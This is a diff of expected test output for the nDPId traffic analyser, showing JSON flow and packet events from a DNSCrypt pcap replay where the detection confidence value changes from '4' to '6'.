AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF8gAL0R2j0KAAABstjJ3pbCCAUGBKQEfSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF4Aub0R\/xEKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF8Aub0R\/xAKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"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"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":946739317463,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739317463,"pkt":"ZmZmZmZmRERERERECABFAADcYmkAADoRvwewOO2rCgAAAQG7v3AAyNgssmOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxoAADgRxYuy2MneCgAAAQgFz30AwELIfSWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxkAADgRxYyy2MneCgAAAQgF6rsAwCeIfSeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} 
@@ -643,24 +643,24 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739317496,"pkt":"ZmZmZmZmRERERERECABFAADUfxwAADgRxYmy2MneCgAAAQgF5XQAwCzTfSOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbsxAAL0R7dwKAAABLUxxH6jYAbsCCGFBZBkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbs0gAL0RChwKAAABLUxxH9fjAbsGBNdkZBYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbs0Aub0RLu8KAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
